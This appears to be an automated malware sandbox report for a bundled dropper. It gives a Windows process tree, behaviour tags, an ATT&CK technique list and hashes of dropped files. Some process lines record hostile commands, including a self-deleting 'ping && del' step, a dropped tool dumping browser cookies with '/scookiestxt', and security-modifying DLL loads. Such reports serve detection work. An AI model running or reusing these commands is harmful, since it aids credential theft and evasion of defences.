                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                                                8⤵
                                                                                                                  PID:6700
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjEF7.tmp\tempfile.ps1"
                                                                                                                  8⤵
                                                                                                                    PID:6296
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      9⤵
                                                                                                                        PID:2352
                                                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                      8⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:3268
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies system certificate store
                                                                                                          PID:4576
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                            3⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:4496
                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                              ping 127.0.0.1
                                                                                                              4⤵
                                                                                                              • Runs ping.exe
                                                                                                              PID:3428
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks whether UAC is enabled
                                                                                                          PID:5548
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5684
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:6432
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:6460
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:6364
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4376
                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                        1⤵
                                                                                                          PID:1088
                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                          1⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          PID:948
                                                                                                          • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                            C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:4264
                                                                                                            • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                              C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:6012
                                                                                                          • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                            C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:4904
                                                                                                            • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                              C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              PID:5592
                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                            C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
                                                                                                            2⤵
                                                                                                            • Windows security modification
                                                                                                            • Drops file in System32 directory
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:5052
                                                                                                          • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                            C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:2612
                                                                                                            • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                              C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              PID:1536
                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                          1⤵
                                                                                                            PID:1008
                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                            1⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3844
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                              2⤵
                                                                                                              • Checks processor information in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Modifies registry class
                                                                                                              PID:3708
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                              2⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Checks processor information in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Modifies registry class
                                                                                                              PID:4180
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                            1⤵
                                                                                                            • Drops file in Windows directory
                                                                                                            • Modifies Internet Explorer settings
                                                                                                            • Modifies registry class
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:4960
                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                            1⤵
                                                                                                            • Modifies Internet Explorer settings
                                                                                                            PID:5028
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:4780
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:4340
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies Internet Explorer settings
                                                                                                            • Modifies registry class
                                                                                                            PID:5280
                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                            1⤵
                                                                                                            • Enumerates connected drives
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Drops file in Windows directory
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            • Modifies registry class
                                                                                                            PID:5328
                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 2B1BABBF76E1D05F6367E68383AF9653 C
                                                                                                              2⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:5536
                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 60CBFAD45DD5506B0833692D31589B73
                                                                                                              2⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Loads dropped DLL
                                                                                                              PID:5876
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                3⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:4404
                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding DCD40EDA4A4858A37F89E30DF66357A4 E Global\MSI0000
                                                                                                              2⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:4760
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:5240
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:6112
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:6188
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            PID:6588
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:5372
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:5260
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:5732
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:5276
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:7144
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:5980
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4752
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:6332
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:6776
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                      1⤵
                                                                                                                        PID:6780
                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                        1⤵
                                                                                                                          PID:6128
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                          1⤵
                                                                                                                          • Modifies registry class
                                                                                                                          PID:1892
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                          1⤵
                                                                                                                          • Modifies registry class
                                                                                                                          PID:7056
                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                          1⤵
                                                                                                                            PID:5584
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                            1⤵
                                                                                                                              PID:6156

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                            Execution

                                                                                                                            Scheduled Task

                                                                                                                            1
                                                                                                                            T1053

                                                                                                                            Persistence

                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                            1
                                                                                                                            T1060

                                                                                                                            Scheduled Task

                                                                                                                            1
                                                                                                                            T1053

                                                                                                                            BITS Jobs

                                                                                                                            1
                                                                                                                            T1197

                                                                                                                            Privilege Escalation

                                                                                                                            Scheduled Task

                                                                                                                            1
                                                                                                                            T1053

                                                                                                                            Defense Evasion

                                                                                                                            Disabling Security Tools

                                                                                                                            2
                                                                                                                            T1089

                                                                                                                            Modify Registry

                                                                                                                            5
                                                                                                                            T1112

                                                                                                                            BITS Jobs

                                                                                                                            1
                                                                                                                            T1197

                                                                                                                            Install Root Certificate

                                                                                                                            1
                                                                                                                            T1130

                                                                                                                            Credential Access

                                                                                                                            Credentials in Files

                                                                                                                            2
                                                                                                                            T1081

                                                                                                                            Discovery

                                                                                                                            Software Discovery

                                                                                                                            1
                                                                                                                            T1518

                                                                                                                            Query Registry

                                                                                                                            5
                                                                                                                            T1012

                                                                                                                            System Information Discovery

                                                                                                                            6
                                                                                                                            T1082

                                                                                                                            Security Software Discovery

                                                                                                                            1
                                                                                                                            T1063

                                                                                                                            Peripheral Device Discovery

                                                                                                                            2
                                                                                                                            T1120

                                                                                                                            Remote System Discovery

                                                                                                                            1
                                                                                                                            T1018

                                                                                                                            Collection

                                                                                                                            Data from Local System

                                                                                                                            2
                                                                                                                            T1005

                                                                                                                            Command and Control

                                                                                                                            Web Service

                                                                                                                            1
                                                                                                                            T1102

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                              MD5

                                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                              SHA1

                                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                              SHA256

                                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                              SHA512

                                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                              MD5

                                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                              SHA1

                                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                              SHA256

                                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                              SHA512

                                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                            • C:\Program Files\Java\GJXQFHEEWB\ultramediaburner.exe
                                                                                                                              MD5

                                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                              SHA1

                                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                              SHA256

                                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                              SHA512

                                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                            • C:\Program Files\Java\GJXQFHEEWB\ultramediaburner.exe
                                                                                                                              MD5

                                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                              SHA1

                                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                              SHA256

                                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                              SHA512

                                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                            • C:\Program Files\install.dat
                                                                                                                              MD5

                                                                                                                              806c3221a013fec9530762750556c332

                                                                                                                              SHA1

                                                                                                                              36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                              SHA256

                                                                                                                              9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                              SHA512

                                                                                                                              56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                            • C:\Program Files\install.dll
                                                                                                                              MD5

                                                                                                                              fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                              SHA1

                                                                                                                              6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                              SHA256

                                                                                                                              9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                              SHA512

                                                                                                                              0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                              MD5

                                                                                                                              21ec89966012581b223f37dfcb95439a

                                                                                                                              SHA1

                                                                                                                              8c25eaae58a7ac90ad37ad6c9f341f94e1089ed3

                                                                                                                              SHA256

                                                                                                                              1765b0a85d23a048d83b9952c834498808fc59444eb4d6ef07a80109ae5b8f7c

                                                                                                                              SHA512

                                                                                                                              349273db8f045a414fb747ebd634179e48c3b22117fc5deb66a8c805f3620b8e7c3682e700a975482d683f3c8f945099c6408e3ae46fd41132727bc8143bd319

                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                              MD5

                                                                                                                              738f87d95d3387db176a831bd856d41a

                                                                                                                              SHA1

                                                                                                                              6c93f69de565349d8674fa25ac93906209478a8e

                                                                                                                              SHA256

                                                                                                                              5353cc718ad3df331ec39394a3e2b161eb273f5d915371dfb388a913f2f2d979

                                                                                                                              SHA512

                                                                                                                              b4492e41ed2cb21912da1761d0827898c2ae9f541f82f5911c3d9c1d99127f6289a6956ae8f0f9f86ce34be97958d0c749017182d2971800e39c5a347185e196

                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                              MD5

                                                                                                                              92f40f9f8e2eafff2c91bcf9edc122be

                                                                                                                              SHA1

                                                                                                                              ed25c6e1ab730079cb97e95e853be8bc0ed519ab

                                                                                                                              SHA256

                                                                                                                              0d90c45e1c0ed9bffdb7acd0790953667a5d52443287b55ca26489da2259bb7e

                                                                                                                              SHA512

                                                                                                                              f0ba14d8fecd1d25a5bf1d02035e448131cd0d51638dc8b8142327bdd2892f57ad7b35c2caa36699577934c3f9ec04638e363e83045fe047d7a840bf20730e83

                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                              MD5

                                                                                                                              d5659549c15d5fe3f71d050c0b6b81cb

                                                                                                                              SHA1

                                                                                                                              bf827bd342cd8864a96698672daba7be2e5a741c

                                                                                                                              SHA256

                                                                                                                              8ca063183ca6d4aa0860b29a1f41996b08461a05c901510aa983518c4f09d643

                                                                                                                              SHA512

                                                                                                                              122f043660a64d4eade337b2270395e7b51f8de42c7c7890f58cf1c6f76eab9b09d73bdfd6063a1438cb706ca88e3a38e8254dcbfa9641e424401bd118bb5e38

                                                                                                                            • C:\Users\Admin\AppData\Local\AdvinstAnalytics\6073fee5118372253d99d22b\1.0.0\tracking.ini
                                                                                                                              MD5

                                                                                                                              6ed615b2c9c8e022716f3beaa6dfcec5

                                                                                                                              SHA1

                                                                                                                              3ac91ec4547bbc913390188c7cf244bbd938b8ba

                                                                                                                              SHA256

                                                                                                                              992c78bd489f589d1e075ed687e3f15ff2f58a1371a0c3762b64ab1bb08ae781

                                                                                                                              SHA512

                                                                                                                              465ede2ba0793f3e886add3afe5e4d61c3dc742a6ed0b86ee3f6d1fc00dd989739416bf6d8a40f0f22ac555a9a9c5ae2a1642a32133d93b6feab1448072210cb

                                                                                                                            • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\UL3O2WOX.cookie
                                                                                                                              MD5

                                                                                                                              c43553033ad80693fb93c8bb425ca32e

                                                                                                                              SHA1

                                                                                                                              d2635407e46eed1016c3e88e823b038ddb4daf66

                                                                                                                              SHA256

                                                                                                                              a333b07abe3caf73cad7b0c47d01d93ffd26edcf63b6cfa74a1871ba2df13ab6

                                                                                                                              SHA512

                                                                                                                              0b5b106dc7776f7cc5257b3de7cd32c01b02c8876d1ed8e75e73f574db3f306d2bea9cb809965bd1b77a9af2fa2b97f4903a01ea253db79a4841af7efd830016

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0ycxy1zz.btb\001.exe
                                                                                                                              MD5

                                                                                                                              fa8dd39e54418c81ef4c7f624012557c

                                                                                                                              SHA1

                                                                                                                              c3cb938cc4086c36920a4cb3aea860aed3f7e9da

                                                                                                                              SHA256

                                                                                                                              0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

                                                                                                                              SHA512

                                                                                                                              66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0ycxy1zz.btb\001.exe
                                                                                                                              MD5

                                                                                                                              fa8dd39e54418c81ef4c7f624012557c

                                                                                                                              SHA1

                                                                                                                              c3cb938cc4086c36920a4cb3aea860aed3f7e9da

                                                                                                                              SHA256

                                                                                                                              0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

                                                                                                                              SHA512

                                                                                                                              66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\17-ba554-b75-30783-be18c8fd65e92\Ryfaerusimi.exe
                                                                                                                              MD5

                                                                                                                              c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                                              SHA1

                                                                                                                              c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                                              SHA256

                                                                                                                              f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                                                              SHA512

                                                                                                                              32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\17-ba554-b75-30783-be18c8fd65e92\Ryfaerusimi.exe
                                                                                                                              MD5

                                                                                                                              c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                                              SHA1

                                                                                                                              c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                                              SHA256

                                                                                                                              f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                                                              SHA512

                                                                                                                              32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\17-ba554-b75-30783-be18c8fd65e92\Ryfaerusimi.exe.config
                                                                                                                              MD5

                                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                                              SHA1

                                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                              SHA256

                                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                              SHA512

                                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\97-d04fd-f90-d43bc-f70231f3028f6\Kenessey.txt
                                                                                                                              MD5

                                                                                                                              97384261b8bbf966df16e5ad509922db

                                                                                                                              SHA1

                                                                                                                              2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                              SHA256

                                                                                                                              9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                              SHA512

                                                                                                                              b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\97-d04fd-f90-d43bc-f70231f3028f6\Taepenawugae.exe
                                                                                                                              MD5

                                                                                                                              1f19330a59c0369f5d0b77b02f275568

                                                                                                                              SHA1

                                                                                                                              0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                                                              SHA256

                                                                                                                              f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                                                              SHA512

                                                                                                                              3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

